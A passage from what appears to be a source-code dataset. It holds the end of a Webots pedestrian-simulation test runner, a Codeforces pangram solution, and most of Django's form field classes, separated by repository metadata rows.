ItemDescription(item_type=ItemDescription.ITEM_TYPE_VEHICLE,
item_index=vhc_ind,
item_state_index=WebotsVehicle.STATE_ID_SPEED))
for ped_ind in range(len(sim_environment.pedestrians_list)):
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_PEDESTRIAN,
item_index=ped_ind,
item_state_index=WebotsVehicle.STATE_ID_POSITION_X))
sim_environment.data_log_description_list.append(
ItemDescription(item_type=ItemDescription.ITEM_TYPE_PEDESTRIAN,
item_index=ped_ind,
item_state_index=WebotsVehicle.STATE_ID_POSITION_Y))
sim_environment.data_log_period_ms = 10
# ----- Create Trajectory dictionary for later reference:
sim_environment.populate_simulation_trace_dict()
sim_config = sim_config_tools.SimulationConfig(1)
sim_config.run_config_arr.append(sim_config_tools.RunConfig())
sim_config.run_config_arr[0].simulation_run_mode = SimData.SIM_TYPE_RUN
sim_config.sim_duration_ms = sim_duration
sim_config.sim_step_size = 10
sim_config.world_file = '../Webots_Projects/worlds/our_world.wbt'
sim_env_configurator = SimEnvironmentConfigurator(sim_config=sim_config)
(is_connected, simulator_instance) = sim_env_configurator.connect(max_connection_retry=3)
if not is_connected:
raise ValueError('Could not connect!')
sim_env_configurator.setup_sim_environment(sim_environment)
trajectory = sim_env_configurator.run_simulation_get_trace()
if for_matlab:
trajectory = experiment_tools.npArray2Matlab(trajectory)
time.sleep(1) # Wait for Webots to reload the world.
# print(trajectory)
# with open("out.csv","w") as f:
# wr = csv.writer(f)
# wr.writerows(trajectory)
return trajectory
def run_covering_array_tests():
    """Execute every test case listed in the covering-array csv file.

    Returns a dict mapping test-case index -> recorded simulation trace.
    """
    csv_file = 'TutorialExample_CA_2way.csv'  # covering-array test suite
    # Load the whole experiment table; the first 6 lines are header metadata.
    experiments = covering_array_utilities.load_experiment_data(csv_file, header_line_count=6)
    total = len(experiments.index)  # one row per test case
    trajectories_dict = {}  # test-case index -> simulation trace
    for exp_ind in range(total):
        # Fetch the row for the current test case.
        row = covering_array_utilities.get_experiment_all_fields(experiments, exp_ind)
        # Pull the three test parameters out of the row.
        ego_init_speed = float(
            covering_array_utilities.get_field_value_for_current_experiment(row, 'ego_init_speed'))
        ego_x_position = float(
            covering_array_utilities.get_field_value_for_current_experiment(row, 'ego_x_position'))
        pedestrian_speed = float(
            covering_array_utilities.get_field_value_for_current_experiment(row, 'pedestrian_speed'))
        print('Running test case {} of {} with parameters: {}, {}, {}.'.format(
            exp_ind + 1, total, ego_init_speed, ego_x_position, pedestrian_speed))
        # Run the simulation for this parameter combination and keep its trace.
        trajectories_dict[exp_ind] = run_test(ego_init_speed_m_s=ego_init_speed,
                                              ego_x_pos=ego_x_position,
                                              pedestrian_speed=pedestrian_speed)
        time.sleep(2)  # Wait for Webots to reload the world.
    return trajectories_dict
# Script entry: run a single simulation with the default test parameters.
# Switch the commented line below to run the whole covering-array suite instead.
run_test()
# run_covering_array_tests()
| 51.494867
| 4,227
| 0.619069
|
acff7a0af94c0030ef39cd60884f419119d4f1ed
| 621
|
py
|
Python
|
problems/A/Pangram.py
|
deveshbajpai19/CodeForces
|
707b374f03012ec68054841f791d48b33ae4ef1b
|
[
"MIT"
] | 55
|
2016-06-19T05:45:15.000Z
|
2022-03-31T15:18:53.000Z
|
problems/A/Pangram.py
|
farhadcu/CodeForces-2
|
707b374f03012ec68054841f791d48b33ae4ef1b
|
[
"MIT"
] | null | null | null |
problems/A/Pangram.py
|
farhadcu/CodeForces-2
|
707b374f03012ec68054841f791d48b33ae4ef1b
|
[
"MIT"
] | 25
|
2016-07-29T13:03:15.000Z
|
2021-09-17T01:45:45.000Z
|
__author__ = 'Devesh Bajpai'
'''
https://codeforces.com/problemset/problem/520/A
Solution: Maintain a set of characters seen in the string. In the end, the size of that set should be 26 denoting all
characters were observed at least once in the string. Make sure we add characters in one case in the set to deal with
upper/lower case characters.
'''
def solve(n, string):
    """Return "YES" if the first n characters of string form a pangram.

    A pangram contains every letter of the English alphabet at least once,
    case-insensitively.

    Args:
        n: number of characters of ``string`` to inspect.
        string: the candidate text.

    Returns:
        "YES" if all 26 letters appear among the first n characters,
        otherwise "NO".
    """
    # BUGFIX: the original used xrange, which does not exist on Python 3.
    # A set comprehension de-duplicates; lower() folds case so 'A' == 'a'.
    seen = {string[i].lower() for i in range(n)}
    return "YES" if len(seen) == 26 else "NO"
if __name__ == "__main__":
    # NOTE(review): raw_input and the statement form of print are Python 2
    # only; this entry point will not run under Python 3 as written.
    n = int(raw_input())  # number of characters to inspect
    string = raw_input()  # candidate string to test for pangram-ness
    print solve(n, string)
| 22.178571
| 117
| 0.68277
|
acff7a54a98abf24adcb1ffda1b7750d1532e474
| 46,816
|
py
|
Python
|
django/forms/fields.py
|
mbox/django
|
9f31d379a759ba76976a93bb3a39c460020ae124
|
[
"BSD-3-Clause"
] | null | null | null |
django/forms/fields.py
|
mbox/django
|
9f31d379a759ba76976a93bb3a39c460020ae124
|
[
"BSD-3-Clause"
] | null | null | null |
django/forms/fields.py
|
mbox/django
|
9f31d379a759ba76976a93bb3a39c460020ae124
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Field classes.
"""
from __future__ import unicode_literals
import copy
import datetime
import os
import re
import sys
import warnings
from decimal import Decimal, DecimalException
from io import BytesIO
from django.core import validators
from django.core.exceptions import ValidationError
from django.forms.utils import from_current_timezone, to_current_timezone
from django.forms.widgets import (
TextInput, NumberInput, EmailInput, URLInput, HiddenInput,
MultipleHiddenInput, ClearableFileInput, CheckboxInput, Select,
NullBooleanSelect, SelectMultiple, DateInput, DateTimeInput, TimeInput,
SplitDateTimeWidget, SplitHiddenDateTimeWidget, FILE_INPUT_CONTRADICTION
)
from django.utils import formats
from django.utils.encoding import smart_text, force_str, force_text
from django.utils.ipv6 import clean_ipv6_address
from django.utils.deprecation import RemovedInDjango19Warning
from django.utils import six
from django.utils.six.moves.urllib.parse import urlsplit, urlunsplit
from django.utils.translation import ugettext_lazy as _, ungettext_lazy
# Provide this import for backwards compatibility.
from django.core.validators import EMPTY_VALUES # NOQA
__all__ = (
'Field', 'CharField', 'IntegerField',
'DateField', 'TimeField', 'DateTimeField',
'RegexField', 'EmailField', 'FileField', 'ImageField', 'URLField',
'BooleanField', 'NullBooleanField', 'ChoiceField', 'MultipleChoiceField',
'ComboField', 'MultiValueField', 'FloatField', 'DecimalField',
'SplitDateTimeField', 'IPAddressField', 'GenericIPAddressField', 'FilePathField',
'SlugField', 'TypedChoiceField', 'TypedMultipleChoiceField'
)
class Field(object):
    """Base class for all form fields.

    Handles widget selection, error-message merging across the MRO, and the
    clean() pipeline (to_python -> validate -> run_validators). Subclasses
    customise to_python()/validate()/widget_attrs().
    """
    widget = TextInput  # Default widget to use when rendering this type of Field.
    hidden_widget = HiddenInput  # Default widget to use when rendering this as "hidden".
    default_validators = []  # Default set of validators
    # Add an 'invalid' entry to default_error_message if you want a specific
    # field error message not raised by the field validators.
    default_error_messages = {
        'required': _('This field is required.'),
    }
    empty_values = list(validators.EMPTY_VALUES)

    # Tracks each time a Field instance is created. Used to retain order.
    creation_counter = 0

    def __init__(self, required=True, widget=None, label=None, initial=None,
                 help_text='', error_messages=None, show_hidden_initial=False,
                 validators=(), localize=False):
        # required -- Boolean that specifies whether the field is required.
        #             True by default.
        # widget -- A Widget class, or instance of a Widget class, that should
        #           be used for this Field when displaying it. Each Field has a
        #           default Widget that it'll use if you don't specify this. In
        #           most cases, the default widget is TextInput.
        # label -- A verbose name for this field, for use in displaying this
        #          field in a form. By default, Django will use a "pretty"
        #          version of the form field name, if the Field is part of a
        #          Form.
        # initial -- A value to use in this Field's initial display. This value
        #            is *not* used as a fallback if data isn't given.
        # help_text -- An optional string to use as "help text" for this Field.
        # error_messages -- An optional dictionary to override the default
        #                   messages that the field will raise.
        # show_hidden_initial -- Boolean that specifies if it is needed to render a
        #                        hidden widget with initial value after widget.
        # validators -- List of additional validators to use
        # localize -- Boolean that specifies if the field should be localized.
        self.required, self.label, self.initial = required, label, initial
        self.show_hidden_initial = show_hidden_initial
        self.help_text = help_text
        widget = widget or self.widget
        if isinstance(widget, type):
            widget = widget()

        # Trigger the localization machinery if needed.
        self.localize = localize
        if self.localize:
            widget.is_localized = True

        # Let the widget know whether it should display as required.
        widget.is_required = self.required

        # Hook into self.widget_attrs() for any Field-specific HTML attributes.
        extra_attrs = self.widget_attrs(widget)
        if extra_attrs:
            widget.attrs.update(extra_attrs)

        self.widget = widget

        # Increase the creation counter, and save our local copy.
        self.creation_counter = Field.creation_counter
        Field.creation_counter += 1

        # Merge default_error_messages from the whole MRO (base classes first)
        # so subclass messages override base-class ones, then apply any
        # per-instance overrides.
        messages = {}
        for c in reversed(self.__class__.__mro__):
            messages.update(getattr(c, 'default_error_messages', {}))
        messages.update(error_messages or {})
        self.error_messages = messages

        # BUGFIX: the signature previously used the mutable default
        # ``validators=[]`` (shared across all calls); use an immutable ()
        # default and copy explicitly with list(). Callers that pass a list
        # are unaffected.
        self.validators = self.default_validators + list(validators)
        super(Field, self).__init__()

    def prepare_value(self, value):
        """Hook to transform a Python value for display; identity here."""
        return value

    def to_python(self, value):
        """Hook to coerce raw submitted data to a Python object; identity here."""
        return value

    def validate(self, value):
        """Raise the 'required' error when an empty value hits a required field."""
        if value in self.empty_values and self.required:
            raise ValidationError(self.error_messages['required'], code='required')

    def run_validators(self, value):
        """Run every validator, collecting all failures into one ValidationError."""
        if value in self.empty_values:
            return
        errors = []
        for v in self.validators:
            try:
                v(value)
            except ValidationError as e:
                # Prefer this field's own message for a known error code.
                if hasattr(e, 'code') and e.code in self.error_messages:
                    e.message = self.error_messages[e.code]
                errors.extend(e.error_list)
        if errors:
            raise ValidationError(errors)

    def clean(self, value):
        """
        Validates the given value and returns its "cleaned" value as an
        appropriate Python object.

        Raises ValidationError for any errors.
        """
        value = self.to_python(value)
        self.validate(value)
        self.run_validators(value)
        return value

    def bound_data(self, data, initial):
        """
        Return the value that should be shown for this field on render of a
        bound form, given the submitted POST data for the field and the initial
        data, if any.

        For most fields, this will simply be data; FileFields need to handle it
        a bit differently.
        """
        return data

    def widget_attrs(self, widget):
        """
        Given a Widget instance (*not* a Widget class), returns a dictionary of
        any HTML attributes that should be added to the Widget, based on this
        Field.
        """
        return {}

    def get_limit_choices_to(self):
        """
        Returns ``limit_choices_to`` for this form field.

        If it is a callable, it will be invoked and the result will be
        returned.
        """
        # NOTE(review): self.limit_choices_to is not assigned by Field itself;
        # it is presumably set by model-aware subclasses — confirm at callers.
        if callable(self.limit_choices_to):
            return self.limit_choices_to()
        return self.limit_choices_to

    def _has_changed(self, initial, data):
        """
        Return True if data differs from initial.
        """
        # For purposes of seeing whether something has changed, None is
        # the same as an empty string, if the data or initial value we get
        # is None, replace it w/ ''.
        initial_value = initial if initial is not None else ''
        try:
            data = self.to_python(data)
            if hasattr(self, '_coerce'):
                data = self._coerce(data)
        except ValidationError:
            # Unparseable input definitely differs from the initial value.
            return True
        data_value = data if data is not None else ''
        return initial_value != data_value

    def __deepcopy__(self, memo):
        """Deep-copy the widget; validators are shallow-copied into a new list."""
        result = copy.copy(self)
        memo[id(self)] = result
        result.widget = copy.deepcopy(self.widget, memo)
        result.validators = self.validators[:]
        return result
class CharField(Field):
    """A text field; optionally enforces minimum/maximum length."""

    def __init__(self, max_length=None, min_length=None, *args, **kwargs):
        self.max_length = max_length
        self.min_length = min_length
        super(CharField, self).__init__(*args, **kwargs)
        # Length limits are enforced through validators so error messages
        # stay consistent with the rest of the framework.
        if min_length is not None:
            self.validators.append(validators.MinLengthValidator(int(min_length)))
        if max_length is not None:
            self.validators.append(validators.MaxLengthValidator(int(max_length)))

    def to_python(self, value):
        """Return the value coerced to text ('' for empty values)."""
        if value in self.empty_values:
            return ''
        return smart_text(value)

    def widget_attrs(self, widget):
        attrs = super(CharField, self).widget_attrs(widget)
        if self.max_length is not None:
            # The HTML attribute is spelled maxlength, without the underscore.
            attrs.update({'maxlength': str(self.max_length)})
        return attrs
class IntegerField(Field):
    """Field that cleans its input to a Python int."""
    widget = NumberInput
    default_error_messages = {
        'invalid': _('Enter a whole number.'),
    }

    def __init__(self, max_value=None, min_value=None, *args, **kwargs):
        self.max_value = max_value
        self.min_value = min_value
        if kwargs.get('localize') and self.widget == NumberInput:
            # Localized number input is not well supported on most browsers
            kwargs.setdefault('widget', super(IntegerField, self).widget)
        super(IntegerField, self).__init__(*args, **kwargs)
        # Enforce the bounds through validators.
        if max_value is not None:
            self.validators.append(validators.MaxValueValidator(max_value))
        if min_value is not None:
            self.validators.append(validators.MinValueValidator(min_value))

    def to_python(self, value):
        """Coerce the input to an int; return None for empty values."""
        value = super(IntegerField, self).to_python(value)
        if value in self.empty_values:
            return None
        if self.localize:
            # Strip localized thousand separators first.
            value = formats.sanitize_separators(value)
        try:
            return int(str(value))
        except (ValueError, TypeError):
            raise ValidationError(self.error_messages['invalid'], code='invalid')

    def widget_attrs(self, widget):
        attrs = super(IntegerField, self).widget_attrs(widget)
        if isinstance(widget, NumberInput):
            # Mirror the bounds as HTML5 min/max attributes.
            if self.min_value is not None:
                attrs['min'] = self.min_value
            if self.max_value is not None:
                attrs['max'] = self.max_value
        return attrs
class FloatField(IntegerField):
    """Field that cleans its input to a Python float."""
    default_error_messages = {
        'invalid': _('Enter a number.'),
    }

    def to_python(self, value):
        """Coerce the input to a float; return None for empty values."""
        # Deliberately skip IntegerField.to_python (which would truncate) and
        # call Field.to_python directly.
        value = super(IntegerField, self).to_python(value)
        if value in self.empty_values:
            return None
        if self.localize:
            value = formats.sanitize_separators(value)
        try:
            return float(value)
        except (ValueError, TypeError):
            raise ValidationError(self.error_messages['invalid'], code='invalid')

    def validate(self, value):
        super(FloatField, self).validate(value)
        # Check for NaN (which is the only thing not equal to itself) and +/- infinity
        if value != value or value in (Decimal('Inf'), Decimal('-Inf')):
            raise ValidationError(self.error_messages['invalid'], code='invalid')
        return value

    def widget_attrs(self, widget):
        attrs = super(FloatField, self).widget_attrs(widget)
        if isinstance(widget, NumberInput) and 'step' not in widget.attrs:
            # Any step is acceptable for floats unless the widget says otherwise.
            attrs.setdefault('step', 'any')
        return attrs
class DecimalField(IntegerField):
    # ungettext_lazy picks the singular/plural message based on the 'max' param.
    default_error_messages = {
        'invalid': _('Enter a number.'),
        'max_digits': ungettext_lazy(
            'Ensure that there are no more than %(max)s digit in total.',
            'Ensure that there are no more than %(max)s digits in total.',
            'max'),
        'max_decimal_places': ungettext_lazy(
            'Ensure that there are no more than %(max)s decimal place.',
            'Ensure that there are no more than %(max)s decimal places.',
            'max'),
        'max_whole_digits': ungettext_lazy(
            'Ensure that there are no more than %(max)s digit before the decimal point.',
            'Ensure that there are no more than %(max)s digits before the decimal point.',
            'max'),
    }

    def __init__(self, max_value=None, min_value=None, max_digits=None, decimal_places=None, *args, **kwargs):
        """Store digit/precision limits; min/max bounds are handled by IntegerField."""
        self.max_digits, self.decimal_places = max_digits, decimal_places
        super(DecimalField, self).__init__(max_value, min_value, *args, **kwargs)

    def to_python(self, value):
        """
        Validates that the input is a decimal number. Returns a Decimal
        instance. Returns None for empty values. Ensures that there are no more
        than max_digits in the number, and no more than decimal_places digits
        after the decimal point.
        """
        if value in self.empty_values:
            return None
        if self.localize:
            # Strip localized thousand separators / decimal marks first.
            value = formats.sanitize_separators(value)
        value = smart_text(value).strip()
        try:
            value = Decimal(value)
        except DecimalException:
            raise ValidationError(self.error_messages['invalid'], code='invalid')
        return value

    def validate(self, value):
        """Enforce max_digits / decimal_places on the Decimal's tuple form."""
        super(DecimalField, self).validate(value)
        if value in self.empty_values:
            return
        # Check for NaN, Inf and -Inf values. We can't compare directly for NaN,
        # since it is never equal to itself. However, NaN is the only value that
        # isn't equal to itself, so we can use this to identify NaN
        if value != value or value == Decimal("Inf") or value == Decimal("-Inf"):
            raise ValidationError(self.error_messages['invalid'], code='invalid')
        sign, digittuple, exponent = value.as_tuple()
        decimals = abs(exponent)
        # digittuple doesn't include any leading zeros.
        digits = len(digittuple)
        if decimals > digits:
            # We have leading zeros up to or past the decimal point. Count
            # everything past the decimal point as a digit. We do not count
            # 0 before the decimal point as a digit since that would mean
            # we would not allow max_digits = decimal_places.
            digits = decimals
        whole_digits = digits - decimals

        if self.max_digits is not None and digits > self.max_digits:
            raise ValidationError(
                self.error_messages['max_digits'],
                code='max_digits',
                params={'max': self.max_digits},
            )
        if self.decimal_places is not None and decimals > self.decimal_places:
            raise ValidationError(
                self.error_messages['max_decimal_places'],
                code='max_decimal_places',
                params={'max': self.decimal_places},
            )
        if (self.max_digits is not None and self.decimal_places is not None
                and whole_digits > (self.max_digits - self.decimal_places)):
            raise ValidationError(
                self.error_messages['max_whole_digits'],
                code='max_whole_digits',
                params={'max': (self.max_digits - self.decimal_places)},
            )
        return value

    def widget_attrs(self, widget):
        attrs = super(DecimalField, self).widget_attrs(widget)
        if isinstance(widget, NumberInput) and 'step' not in widget.attrs:
            if self.decimal_places is not None:
                # Use exponential notation for small values since they might
                # be parsed as 0 otherwise. ref #20765
                step = str(Decimal('1') / 10 ** self.decimal_places).lower()
            else:
                step = 'any'
            attrs.setdefault('step', step)
        return attrs
class BaseTemporalField(Field):
    """Shared machinery for date/time fields: try each input format in turn."""

    def __init__(self, input_formats=None, *args, **kwargs):
        super(BaseTemporalField, self).__init__(*args, **kwargs)
        # Only override the class-level input_formats when explicitly given.
        if input_formats is not None:
            self.input_formats = input_formats

    def to_python(self, value):
        """Parse a text value against each input format; raise if none match."""
        # Try to coerce the value to unicode.
        text = force_text(value, strings_only=True)
        if isinstance(text, six.text_type):
            value = text.strip()
        # If unicode, try to strptime against each input format.
        if isinstance(value, six.text_type):
            for fmt in self.input_formats:
                try:
                    return self.strptime(value, fmt)
                except (ValueError, TypeError):
                    pass
        raise ValidationError(self.error_messages['invalid'], code='invalid')

    def strptime(self, value, format):
        raise NotImplementedError('Subclasses must define this method.')
class DateField(BaseTemporalField):
    """Field that cleans its input to a datetime.date."""
    widget = DateInput
    input_formats = formats.get_format_lazy('DATE_INPUT_FORMATS')
    default_error_messages = {
        'invalid': _('Enter a valid date.'),
    }

    def to_python(self, value):
        """Return a datetime.date, or None for empty values."""
        if value in self.empty_values:
            return None
        # A datetime is accepted too; keep only its date portion.
        # (datetime must be checked first: it is a subclass of date.)
        if isinstance(value, datetime.datetime):
            return value.date()
        if isinstance(value, datetime.date):
            return value
        # Otherwise parse the string against DATE_INPUT_FORMATS.
        return super(DateField, self).to_python(value)

    def strptime(self, value, format):
        return datetime.datetime.strptime(force_str(value), format).date()
class TimeField(BaseTemporalField):
    """Field that cleans its input to a datetime.time."""
    widget = TimeInput
    input_formats = formats.get_format_lazy('TIME_INPUT_FORMATS')
    default_error_messages = {
        'invalid': _('Enter a valid time.')
    }

    def to_python(self, value):
        """Return a datetime.time, or None for empty values."""
        if value in self.empty_values:
            return None
        if isinstance(value, datetime.time):
            return value
        # Otherwise parse the string against TIME_INPUT_FORMATS.
        return super(TimeField, self).to_python(value)

    def strptime(self, value, format):
        return datetime.datetime.strptime(force_str(value), format).time()
class DateTimeField(BaseTemporalField):
    widget = DateTimeInput
    input_formats = formats.get_format_lazy('DATETIME_INPUT_FORMATS')
    default_error_messages = {
        'invalid': _('Enter a valid date/time.'),
    }

    def prepare_value(self, value):
        # Display datetimes in the current timezone rather than their stored one.
        if isinstance(value, datetime.datetime):
            value = to_current_timezone(value)
        return value

    def to_python(self, value):
        """
        Validates that the input can be converted to a datetime. Returns a
        Python datetime.datetime object.
        """
        if value in self.empty_values:
            return None
        if isinstance(value, datetime.datetime):
            return from_current_timezone(value)
        if isinstance(value, datetime.date):
            # A bare date becomes midnight of that day.
            result = datetime.datetime(value.year, value.month, value.day)
            return from_current_timezone(result)
        if isinstance(value, list):
            # Input comes from a SplitDateTimeWidget, for example. So, it's two
            # components: date and time.
            warnings.warn(
                'Using SplitDateTimeWidget with DateTimeField is deprecated. '
                'Use SplitDateTimeField instead.',
                RemovedInDjango19Warning, stacklevel=2)
            if len(value) != 2:
                raise ValidationError(self.error_messages['invalid'], code='invalid')
            if value[0] in self.empty_values and value[1] in self.empty_values:
                return None
            # Recombine the two components into a single parseable string.
            value = '%s %s' % tuple(value)
        # Parse the (possibly recombined) string against DATETIME_INPUT_FORMATS.
        result = super(DateTimeField, self).to_python(value)
        return from_current_timezone(result)

    def strptime(self, value, format):
        return datetime.datetime.strptime(force_str(value), format)
class RegexField(CharField):
    def __init__(self, regex, max_length=None, min_length=None, error_message=None, *args, **kwargs):
        """
        regex can be either a string or a compiled regular expression object.
        error_message is an optional error message to use, if
        'Enter a valid value' is too generic for you.
        """
        # error_message is just kept for backwards compatibility:
        if error_message:
            error_messages = kwargs.get('error_messages') or {}
            error_messages['invalid'] = error_message
            kwargs['error_messages'] = error_messages
        super(RegexField, self).__init__(max_length, min_length, *args, **kwargs)
        self._set_regex(regex)

    def _get_regex(self):
        return self._regex

    def _set_regex(self, regex):
        # Accept either a pattern string or a pre-compiled regex object.
        if isinstance(regex, six.string_types):
            regex = re.compile(regex, re.UNICODE)
        self._regex = regex
        # Re-assigning the regex must replace the previously installed
        # validator, not stack a second one.
        if hasattr(self, '_regex_validator') and self._regex_validator in self.validators:
            self.validators.remove(self._regex_validator)
        self._regex_validator = validators.RegexValidator(regex=regex)
        self.validators.append(self._regex_validator)

    # Exposed as a property so assigning field.regex swaps the validator too.
    regex = property(_get_regex, _set_regex)
class EmailField(CharField):
    """CharField validated as an e-mail address."""
    widget = EmailInput
    default_validators = [validators.validate_email]

    def clean(self, value):
        # Trim surrounding whitespace before the e-mail validator runs.
        stripped = self.to_python(value).strip()
        return super(EmailField, self).clean(stripped)
class FileField(Field):
    widget = ClearableFileInput
    default_error_messages = {
        'invalid': _("No file was submitted. Check the encoding type on the form."),
        'missing': _("No file was submitted."),
        'empty': _("The submitted file is empty."),
        'max_length': ungettext_lazy(
            'Ensure this filename has at most %(max)d character (it has %(length)d).',
            'Ensure this filename has at most %(max)d characters (it has %(length)d).',
            'max'),
        'contradiction': _('Please either submit a file or check the clear checkbox, not both.')
    }

    def __init__(self, *args, **kwargs):
        # max_length bounds the filename length; allow_empty_file permits
        # zero-byte uploads.
        self.max_length = kwargs.pop('max_length', None)
        self.allow_empty_file = kwargs.pop('allow_empty_file', False)
        super(FileField, self).__init__(*args, **kwargs)

    def to_python(self, data):
        """Return the uploaded file object (or None); validate its name and size."""
        if data in self.empty_values:
            return None

        # UploadedFile objects should have name and size attributes.
        try:
            file_name = data.name
            file_size = data.size
        except AttributeError:
            raise ValidationError(self.error_messages['invalid'], code='invalid')

        if self.max_length is not None and len(file_name) > self.max_length:
            params = {'max': self.max_length, 'length': len(file_name)}
            raise ValidationError(self.error_messages['max_length'], code='max_length', params=params)
        if not file_name:
            raise ValidationError(self.error_messages['invalid'], code='invalid')
        if not self.allow_empty_file and not file_size:
            raise ValidationError(self.error_messages['empty'], code='empty')

        return data

    def clean(self, data, initial=None):
        """Clean the upload, honouring the widget's "clear" checkbox semantics."""
        # If the widget got contradictory inputs, we raise a validation error
        if data is FILE_INPUT_CONTRADICTION:
            raise ValidationError(self.error_messages['contradiction'], code='contradiction')
        # False means the field value should be cleared; further validation is
        # not needed.
        if data is False:
            if not self.required:
                return False
            # If the field is required, clearing is not possible (the widget
            # shouldn't return False data in that case anyway). False is not
            # in self.empty_value; if a False value makes it this far
            # it should be validated from here on out as None (so it will be
            # caught by the required check).
            data = None
        # Keep the previously stored file when nothing new was uploaded.
        if not data and initial:
            return initial
        return super(FileField, self).clean(data)

    def bound_data(self, data, initial):
        # Re-display the initial file when no (or contradictory) data came in.
        if data in (None, FILE_INPUT_CONTRADICTION):
            return initial
        return data

    def _has_changed(self, initial, data):
        # Any newly submitted file counts as a change; no upload means no change.
        if data is None:
            return False
        return True
class ImageField(FileField):
    default_error_messages = {
        'invalid_image': _("Upload a valid image. The file you uploaded was either not an image or a corrupted image."),
    }

    def to_python(self, data):
        """
        Checks that the file-upload field data contains a valid image (GIF, JPG,
        PNG, possibly others -- whatever the Python Imaging Library supports).
        """
        f = super(ImageField, self).to_python(data)
        if f is None:
            return None

        # Imported lazily so PIL/Pillow is only required when images are used.
        from PIL import Image

        # We need to get a file object for Pillow. We might have a path or we might
        # have to read the data into memory.
        if hasattr(data, 'temporary_file_path'):
            file = data.temporary_file_path()
        else:
            if hasattr(data, 'read'):
                file = BytesIO(data.read())
            else:
                file = BytesIO(data['content'])

        try:
            # load() could spot a truncated JPEG, but it loads the entire
            # image in memory, which is a DoS vector. See #3848 and #18520.
            # verify() must be called immediately after the constructor.
            Image.open(file).verify()
        except Exception:
            # Pillow doesn't recognize it as an image.
            # Re-raise as ValidationError, preserving the original traceback.
            six.reraise(ValidationError, ValidationError(
                self.error_messages['invalid_image'],
                code='invalid_image',
            ), sys.exc_info()[2])
        # Rewind so later consumers can re-read the upload from the start.
        if hasattr(f, 'seek') and callable(f.seek):
            f.seek(0)
        return f
class URLField(CharField):
    widget = URLInput
    default_error_messages = {
        'invalid': _('Enter a valid URL.'),
    }
    default_validators = [validators.URLValidator()]

    def to_python(self, value):
        """Normalise the URL: supply a default scheme and promote a bare path
        to the host position."""

        def split_url(url):
            """
            Returns a list of url parts via ``urlparse.urlsplit`` (or raises a
            ``ValidationError`` exception for certain).
            """
            try:
                return list(urlsplit(url))
            except ValueError:
                # urlparse.urlsplit can raise a ValueError with some
                # misformatted URLs.
                raise ValidationError(self.error_messages['invalid'], code='invalid')

        value = super(URLField, self).to_python(value)
        if value:
            url_fields = split_url(value)
            if not url_fields[0]:
                # If no URL scheme given, assume http://
                url_fields[0] = 'http'
            if not url_fields[1]:
                # Assume that if no domain is provided, that the path segment
                # contains the domain.
                url_fields[1] = url_fields[2]
                url_fields[2] = ''
                # Rebuild the url_fields list, since the domain segment may now
                # contain the path too.
                url_fields = split_url(urlunsplit(url_fields))
            value = urlunsplit(url_fields)
        return value

    def clean(self, value):
        # Strip surrounding whitespace before the URL validator runs.
        value = self.to_python(value).strip()
        return super(URLField, self).clean(value)
class BooleanField(Field):
    """Field rendered as a checkbox; cleans its input to True/False."""
    widget = CheckboxInput

    def to_python(self, value):
        """Returns a Python boolean object."""
        # Explicitly check for the string 'False', which is what a hidden field
        # will submit for False. Also check for '0', since this is what
        # RadioSelect will provide. Because bool("True") == bool('1') == True,
        # we don't need to handle that explicitly.
        is_false_string = (isinstance(value, six.string_types)
                           and value.lower() in ('false', '0'))
        value = False if is_false_string else bool(value)
        return super(BooleanField, self).to_python(value)

    def validate(self, value):
        # A required BooleanField must be True (the checkbox must be ticked).
        if self.required and not value:
            raise ValidationError(self.error_messages['required'], code='required')

    def _has_changed(self, initial, data):
        # show_hidden_initial may have transformed False to 'False'
        if initial == 'False':
            initial = False
        # Normalise both sides to bool: None/'' count the same as False.
        return bool(initial) != bool(data)
class NullBooleanField(BooleanField):
    """
    A field whose valid values are None, True and False. Invalid values are
    cleaned to None.
    """
    widget = NullBooleanSelect

    def to_python(self, value):
        """
        Map 'True'/'1' to True and 'False'/'0' to False; anything else becomes
        None. Unlike BooleanField we must check for True explicitly because
        bool() is not used here.
        """
        if value in (True, 'True', '1'):
            return True
        if value in (False, 'False', '0'):
            return False
        return None

    def validate(self, value):
        # None is a legitimate value here, so nothing to enforce.
        pass

    def _has_changed(self, initial, data):
        # None (unknown) and False (No) are not the same
        initial = bool(initial) if initial is not None else None
        data = bool(data) if data is not None else None
        return initial != data
class ChoiceField(Field):
    widget = Select
    default_error_messages = {
        'invalid_choice': _('Select a valid choice. %(value)s is not one of the available choices.'),
    }

    def __init__(self, choices=(), required=True, widget=None, label=None,
                 initial=None, help_text='', *args, **kwargs):
        super(ChoiceField, self).__init__(required=required, widget=widget, label=label,
                                          initial=initial, help_text=help_text, *args, **kwargs)
        self.choices = choices

    def __deepcopy__(self, memo):
        # Choices must be copied too so per-form mutation stays isolated.
        result = super(ChoiceField, self).__deepcopy__(memo)
        result._choices = copy.deepcopy(self._choices, memo)
        return result

    def _get_choices(self):
        return self._choices

    def _set_choices(self, value):
        # Setting choices also sets the choices on the widget.
        # choices can be any iterable, but we call list() on it because
        # it will be consumed more than once.
        self._choices = self.widget.choices = list(value)

    choices = property(_get_choices, _set_choices)

    def to_python(self, value):
        "Returns a Unicode object."
        if value in self.empty_values:
            return ''
        return smart_text(value)

    def validate(self, value):
        """
        Validates that the input is in self.choices.
        """
        super(ChoiceField, self).validate(value)
        if value and not self.valid_value(value):
            raise ValidationError(
                self.error_messages['invalid_choice'],
                code='invalid_choice',
                params={'value': value},
            )

    def valid_value(self, value):
        "Check to see if the provided value is a valid choice"
        # Compare both raw and text forms so e.g. 1 matches '1'.
        text_value = force_text(value)
        for k, v in self.choices:
            if isinstance(v, (list, tuple)):
                # This is an optgroup, so look inside the group for options
                for k2, v2 in v:
                    if value == k2 or text_value == force_text(k2):
                        return True
            else:
                if value == k or text_value == force_text(k):
                    return True
        return False
class TypedChoiceField(ChoiceField):
    """ChoiceField whose clean() additionally coerces the value to a type."""

    def __init__(self, *args, **kwargs):
        # coerce defaults to identity; empty_value defaults to ''.
        self.coerce = kwargs.pop('coerce', lambda val: val)
        self.empty_value = kwargs.pop('empty_value', '')
        super(TypedChoiceField, self).__init__(*args, **kwargs)

    def _coerce(self, value):
        """
        Validate that the value can be coerced to the right type (if not empty).
        """
        if value == self.empty_value or value in self.empty_values:
            return self.empty_value
        try:
            return self.coerce(value)
        except (ValueError, TypeError, ValidationError):
            raise ValidationError(
                self.error_messages['invalid_choice'],
                code='invalid_choice',
                params={'value': value},
            )

    def clean(self, value):
        return self._coerce(super(TypedChoiceField, self).clean(value))
class MultipleChoiceField(ChoiceField):
